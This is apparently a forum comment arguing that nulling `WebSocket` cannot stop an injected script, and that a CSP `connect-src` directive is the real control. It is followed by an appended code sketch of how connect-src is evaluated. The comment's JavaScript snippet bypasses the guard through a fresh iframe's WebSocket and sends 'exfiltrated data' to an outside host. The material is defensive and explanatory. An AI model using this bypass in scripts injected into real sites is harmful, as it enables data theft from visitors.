by odensc
2217 days ago
The window was just one example (obviously not the most optimal method); there are many other ways you could get around it. My point is `WebSocket = null` won't stop someone who is already dedicated enough to inject a script onto your site to steal people's webpack hot reload error messages. Really, a CSP with `connect-src` is the only way to fully prevent this.

Here's one very simple way to get around your method:

```javascript
WebSocket = null;
// A fresh iframe has its own window, with its own untouched WebSocket constructor.
let el = document.createElement("iframe");
document.body.append(el);
let ws = new el.contentWindow.WebSocket("wss://echo.websocket.org");
ws.onopen = () => ws.send("my exfiltrated data");
```
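An added example, not part of the comment above: a simplified model of the `connect-src` control it recommends, which the browser applies to the connection target rather than to whichever `WebSocket` reference the script obtained. The function names and the `example.test` hostnames are assumptions made for illustration, and the matcher covers only `'none'`, `'self'` (as an exact origin match), scheme sources and exact origins.

```javascript
// Added example: simplified model of CSP connect-src evaluation.
// Hostnames under example.test are constructed placeholders.

// Build a header value that restricts where scripts may open connections
// (fetch, XHR, EventSource, WebSocket).
function buildCsp(sources) {
  return `default-src 'self'; connect-src ${sources.join(" ")}`;
}

// Return the source list governing connections: connect-src if present,
// otherwise default-src, otherwise null (no restriction).
function connectSources(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = (name || "").toLowerCase();
    if (key && !directives.has(key)) directives.set(key, sources);
  }
  return directives.get("connect-src") ?? directives.get("default-src") ?? null;
}

// Simplified matcher. Real browsers also handle wildcards, ports and paths;
// this sketch treats 'self' as an exact origin match only.
function connectAllowed(policy, pageOrigin, targetUrl) {
  const sources = connectSources(policy);
  if (sources === null) return true;
  const target = new URL(targetUrl);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === pageOrigin;
    if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol === src.toLowerCase();
    try {
      return new URL(src).origin === target.origin;
    } catch {
      return false; // keywords such as 'unsafe-inline' are not connection targets
    }
  });
}

// Constructed policy: same-origin requests plus one dev-server socket.
const examplePolicy = buildCsp(["'self'", "wss://hmr.example.test"]);
const page = "https://app.example.test";
console.log(examplePolicy);
console.log(connectAllowed(examplePolicy, page, "wss://hmr.example.test/socket")); // allowed
console.log(connectAllowed(examplePolicy, page, "wss://echo.websocket.org"));      // blocked
```

Serve the header value as `Content-Security-Policy` on the page response; a `Content-Security-Policy-Report-Only` header with the same value lets you observe violations before enforcing.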